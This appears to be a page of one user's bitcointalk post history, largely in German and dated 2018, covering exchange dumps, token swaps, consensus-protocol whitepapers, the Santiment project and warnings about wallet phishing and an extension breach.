Liqui's adress funneling delisted assets: https://etherscan.io/address/0xcc5570e7d39ba1738333782fb0c5623fb6a6b1f2#tokentxns

Liqui dumping on bancor resulting in over 25% loss in value whilst half of the coins are still waiting to be dumped! https://etherscan.io/address/0x1a96e5d134dcf6c654ac11eca5e7e1cd012b87de#tokentxns

Please share your opinion / proof / view on this and get this post upvoted & added loaded with information that matters. Perhaps binance & bancor should be informed to freeze their account and investigate the case before further dumps will continue.

https://www.reddit.com/r/CryptoCurrency/comments/9wou46/warning_liquiio_is_likely_liquidating_their/


Edit: Falls Fehlalarm sorry, Vorsicht ist besser als Nachsicht...
13  Local / Altcoins (Deutsch) / [Termin]Sophia TX Token Swap on: July 25, 2018, 08:04:48 AM
Das ist mir irgendwie total durch die Lappen gegangen, habe das heute zufällig gesehen, weil ich mal gucken wollte, warum der Preis die letzten zwei Tage so runter ist.

Quote
Die Frist zur Registrierung Ihres SPHTX Accounts ist der 23. Juli 2018, 23:59 (MESZ)

Habe gerade nochmal hier im Forum nachgesehen, und es gibt nochmal ne Fristverlängerung.

SophiaTX - The Blockchain for Business
Dear community. We have received news that Cobinhood and Coinfalcon will NOT support the SPHTX swap. We hence advise you to withdraw SPHTX from Coinfalcon until August 6th.

Snapshot and User Registration has been succesfull!
Dear community. We are happy to announce that the Snapshot and User Registration has been succesfull! For those who couldn't make it on time, don't worry. We are going to release the instructions for the late registration very soon.
14  Local / Altcoins (Deutsch) / IMMO on: July 16, 2018, 05:39:11 PM
Ich mache einfach mal nen eigenen Faden zu dem Thema auf. Das letzte Mal hatte ich etwas dazu im NEM Faden gepostet, aber es konnte mich keiner erleuchten warum es im NEM reddit war.
Da ich glaube, dass wir noch mehr von diesem polarisierendem Thema hören werden können wir uns hier in Zukunft austauschen.

In dem neuerlichen Artikel geht's um ein geleaktes Dokument, aus welchem Ableitungen getroffen werden.
u.A.

Quote
IMMO positions itself as a world crypto standard and reserve currency based on fundamental values. Apparently, combining the qualities of digital currency and fiat money, IMMO offers a new paradigm of intrinsic value.

Quote
Die IMMO positioniert sich als Weltkryptostandard und Reservewährung basierend auf fundamentalen Werten. Scheinbar kombiniert die IMMO die Qualitäten von digitaler Währung und Papiergeld und bietet damit ein neues Paradigma von intrinsischem Wert.

Es wird gemunkelt, dass sich die Finanzdynastie Rothschild hinter der Entwicklung von IMMO verbirgt. Ferner wird in dem Artikel von einer "TEAM-HIGH 1000" Gruppe gesprochen, welche wohl weltweit aus Leute mit Wissen um Blockchain, Cryptos und Finanzen besteht. Es wurde auch eine URL gepostet: https://immo.foundation/ und um mich mal an der Spekulation etwas zu beteilligen.... das erste, an das ich bei der O Animation von IMMO denken musste, war Monero und Ethereum, und deren "Verschmelzung"  Grin Was Vitalik zu IMMO denkt und sagt ist ja bekannt "STAY AWAY!"

https://www.newsbtc.com/2018/07/16/immo-leakage-who-is-behind-the-mysterious-project/

Hier könnt ihr euch gleich noch für das TEAM-HIGH 1000 bewerben, wobei ich für meinen Teil da kein Schabernack treiben wollte Roll Eyes
https://immo.foundation/request

Hier noch etwas Plausch aus dem englischen Teil des Forums...
https://bitcointalk.org/index.php?topic=3988176.20

den hatte ich schon geteilt?
https://cryptopotato.com/stop-immo-what-do-experts-think-about-bankers-invading-the-crypto-space/
15  Local / Altcoins (Deutsch) / etherscan.io zeigt Token nicht an on: July 15, 2018, 10:24:46 AM
Ich habe gestern mal wieder meinen Saustall etwas ausgemistet, und bin fast vom Stuhl gefallen. Ich nutze Metamask und schau mir die Token immer auf etherscan.io an. Weder wurde meine Token angezeigt, noch ein Transfer von diesen auf die Adresse. Ich habe dann noch ne andere Adresse gecheckt, und auch dort keine Token. Scheint, als sind das Auswirkungen der Performance Probleme oder aus auch sonst immer.

Jedenfalls habe ich dann myCrypto installiert, welches von myEtherwallet empfohlen wird, habe dort noch Token gescannt, und siehe da, mein Tokens wurden wieder gefunden. puh.... ich haate schon an mir gezweifelt, manchmal ist man sich gar nicht mehr so sicher, oder vielleicht ist man auch Opfer eines Diebstahls geworden oder, oder oder.


lange Rede kurzer Sinn, falls jemandem etwas ähnliche passiert, dass seine Token nicht angezeigt werden, nicht gleich vom Stuhl fallen. Bei ethplorer.io wurden sie übrigens auch nicht angezeigt Angry

In diesem Sinnen, schönen Sonntag, und viel Spaß beim Spiel, "Allez les Bleus" Grin Verdient hätten es ja beide, aber es kann nur einen geben Roll Eyes

edit: ich hatte das gestern auch schon, und heute war es immer noch, daher habe ich gedacht ich schreibe es mal hier...
16  Local / Altcoins (Deutsch) / ACHTUNG: MyEtherWallet Hola’s Chrome extension on: July 10, 2018, 12:41:48 PM
Für 5 Stunden konnte die Hacker, jedwede Aktivität über die Chrome Extension Hola "mitlesen". MEW empfiehlt alle "Mittel" in Sicherheit zu bringen.

Quote
Breaking: MyEtherWallet Urges Hola Users to Move All Their Funds

According to MEW, Hola reportedly has experienced a breach that had lasted about five hours, allowing hackers to log any activity that users of the extension may have done on the wallet platform.
Read more: https://cryptovest.com/news/breaking-myetherwallet-urges-hola-users-to-move-all-their-funds/

Die Meldung ist leider bereits 8h alt...

Quote
Urgent! If you have Hola chrome extension installed and used MEW within the last 24 hrs, please transfer your funds immediately to a brand new account!
21:39 - 9. Juli 2018
https://twitter.com/myetherwallet/status/1016542460552495104
17  Local / Altcoins (Deutsch) / NEW Metastable Consensus Protocol Family von Snowflake zu Avalanche on: July 09, 2018, 09:05:24 AM
Von der Schneeflocke zur Lawine, aber hoffentlich kein Schneeballsystem im deutschen Sinne Grin

Cornell University professor Emin Gün Sirer schwärmt seit ein paar Wochen von der neuen Protokoll Familie. Er ist eine bekannte Größe im Blockchain Ecosystem und was ich bisher von ihm gelesen habe fand ich gut (kritisch und sachlich).

Das neue "Pokomon" whitepaper von "Team Rocket" hört sich echt spannend an (ich konnte nicht widerstehen  Roll Eyes), hat sich schon jemand damit auseinander gesetzt, gibt's schon Meinungen dazu? Falls jemandem ein Projekt mit dem consens Protokoll über den Weg läuft wäre ich für nen Hinweis sehr dankbar, aber vermutlich wird das noch ne ganze Weile dauern bis da was kommt.

Soweit ich das verstehe, werden mehrere Protokolle ineinander verschachtelt und darauf basierend weiter aufgebaut. So wird anfänglich das Slush Protokoll in einem Netzwerk mit byzantinischen Nodes ohne Fehlertoleranz integriert. Darauf basierend erweitert "Snowflake" Slush mit einem einfachen Zähler, welcher die "Stärke/Kraft" der Node speichert. Durch entsprechende Parametrisierung wird dann eine Fehlertoleranz erzeugt (glaube ich verstanden zu haben Grin). Dann fügt "Snowball" vertrauen hinzu. Und hier bin ich technisch dann ausgestiegen  Roll Eyes Zwar kann ich dem englischen noch einigermaßen folgen, aber sinnvoll, lesbar übersetzt bekomme ich es dann nicht mehr, von den Formeln im WP ganz zu schweigen Tongue
Quote
Snowball augments Snowflake with confidence counters that capture the number of queries that have yielded a threshold result for their corresponding color (Figure 3).
A node decides a color if, during a certain number of consecutive queries, its con-fidence for that color exceeds that of other colors. The differences between Snow-flake
and Snowball are as follows:
1. Upon every successful query, the node increments its
confidence counter for that color.
2. A node switches colors when the confidence in its
current color becomes lower than the confidence value of
the new color.

Danach wir mit Avalanche DAG eingeführt.
Mit Avalanche wird das letzte Protokoll eingeführt, es generalisiert Snowball und wartet die dynamischen "append-only" Directed Acyclic Graph (DAG) aller bekannten Transaktionen.
Quote
The DAG has a single sink that is the genesis vertex.
Hier hat google Translate nciht wirklich weitergeholen ="Die DAG hat eine einzige Senke, die der Genesscheitel ist"  Grin
Und meine Übersetzung hiervon erspare ich euch auch besser....
Quote
Maintaining a DAG provides two significant benefits. First, it improves effi-ciency, because a single vote on a DAG vertex implicitly votes for all transactions on the path to the genesis vertex.
Second, it also improves security, because the DAG intertwines the fate of transac-tions, similar to the Bitcoin blockchain. This renders past decisions difficult to undo without the approval of correct nodes.

whitepaper (https://ipfs.io/ipfs/QmUy4jh5mGNZvLkjies1RWM4YuvJh5o2FYopNPVYwrRVGV)

https://www.coindesk.com/emin-gun-sirer-unveils-simple-yet-powerful-consensus-protocol/
https://medium.com/zkcapital/demystifying-snowflake-to-avalanche-966f56c33fd7
18  Local / Altcoins (Deutsch) / ACHTUNG: neue phishing Attacken auf Metamask Nutzer on: June 21, 2018, 09:08:26 AM
Wer Metamask nutzt hat bei Starten von Metamask folgenden Hinweis auf den Medium Artikel bekommen, bislang wurde wohl bereits zwei Seiten kompromittiert, bei einer dritten ist es ungewiss.
Durch den Angriff wird suggeriert, als hätte es ein Metamask Update gegeben und man müsse nun seinen 12 Wörter seed zur Wiederherstellung eingeben.

BTC Manager
Games Workshop
Trakt TV (unresolved at the time of this writing)



https://medium.com/metamask/new-phishing-strategy-becoming-common-1b1123837168
19  Local / Altcoins (Deutsch) / Vorsicht beim Lumi wallet on: June 08, 2018, 09:19:21 AM
Es gibt zwar noch keine "abschließenden" Beweise, aber Vorsicht ist besser als Nachsicht.

Quote
Do Not Trust Lumi Wallet
tl;dr: their web wallet sends your mnemonic phrase to their servers
https://medium.com/@dandisagrees/a0cf1dd70fd0
20  Local / Altcoins (Deutsch) / SANTIMENT on: May 16, 2018, 08:16:16 AM
Ich oute mich ja immer wieder als Santiment Freund, bin auch seit dem ICO dabei und berichte immer mal wieder über Fortschritte. Da es hier keinen eigenen Thread im deutschen Sub gibt, mache ich den jetzt auf, und werde einfach immer mal wieder hier Neuigkeiten posten.
https://santiment.net/
https://twitter.com/santimentfeed
https://medium.com/santiment

Zum Projekt selbst gibt's hier den Ann Thread

Quote
[ANN] SANTIMENT / Crypto-Market Intelligence Platform + Bloomberg Style Terminal
https://bitcointalk.org/index.php?topic=1783230.0

So grob zusammengefasst(überarbeiteter google Translate):
Quote
Die Santiment Vision & Marktübersicht
Santiment wird die Finanzmarktdaten- und Content-Plattform der Wahl für Kryptowährung und Blockchain Space sein und damit die Rolle ausfüllen, die Bloomberg und Thomson Reuters auf traditionellen Finanzmärkten spielen. Santiment bietet Datafeeds und Content-Streams (einschließlich Newswires) neben einer regelmäßig aktualisierten Datenbank mit Kryptowährungsprojekten. Sein langfristiges Ziel ist es, die Marktdateninfrastruktur für Kryptowährung und Blockchains zu sein.

Der Markt für Santiment-Dienstleistungen ist folgender: Wealth- und Hedge-Fonds-Manager, Newcomer-Händler und Datenverkaufskanäle. Manager von Wealth- und Hedge-Fonds suchen nach einer Vielzahl nützlicher Datenfeeds, häufig für den quantitativen Handel. Newcomer bevorzugen verdaulichere Inhalte, die ihnen einen Einblick in Markttrends geben. Datenverkaufskanäle wie Börsen (eToro, Bittrex, Kraken) und Asset-Management-Plattformen (ICONOMI, Melonport) suchen nach ready-to-go Datenlösungen, die ihnen einen Wettbewerbsvorteil verschaffen. Für all diese Parteien hat Santiment eine Lösung anzubieten. Der Mainstream-Markt für Marktdaten lag 2016 bei über 28 Milliarden US-Dollar, und dieser Markt wird einen ähnlichen Anteil erreichen, wenn die Kryptomärkte wachsen.

Marktproblem und die Santiment-Lösung
Es gibt ein ernstes Problem im Blockchain-Bereich; Wir bauen die Zukunft des Finanzwesens auf, doch es fehlen uns die Instrumente, um effektiv zu handeln. Zuverlässige Marktinformationen sind sehr schwer zu bekommen. Stattdessen gibt es einen konstanten Fluss von Fehlinformationen. Und wo sind die kryptospezifischen Datafeeds und Analytics? Handelszeitschriften? Basiswerkzeug? Es ist offensichtlich, dass die Kryptomärkte von der Crowd-Stimmung ausgehen, aber es gibt auch keine Möglichkeit, diese Art von Daten zu bekommen. Es gibt große Probleme, die über die Kryptomärkte hinausgehen. Insbesondere der Mangel an überprüfbaren Informationen und nutzbaren Daten macht Kryptohändler und Investoren anfällig für dramatische Informationsasymmetrie und Betrügereien. Santiment löst diese Probleme mit harten Daten und Markteinblicken.

Als Händler wollen wir mit Disziplin handeln, Fehler identifizieren und korrigieren und die Profitabilität steigern. Santiment baut die Datafeeds-Plattform und Tools zur Lösung dieser Probleme auf und erstellt gleichzeitig einen neuen Informationsstandard für den Handel mit Kryptowährung und Blockchain-Assets. Mit Datenfeeds zu Marktstimmung und Blockchain-Aktivität können die Nutzer die Märkte in Echtzeit beobachten. Durch die Schaffung einer transparenten Projektdatenbank bietet Santiment Investoren die Möglichkeit, Betrügereien zu erkennen und zu vermeiden. In Kombination mit objektiven Datafeeds und von Experten kuratierten Inhalten bieten diese Lösungen Abonnenten einen Handelsvorteil, während sie das Risiko mindern.

Näher will ich auf das Grundlegende gar nicht eingehen...
Pages: [1] 2
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!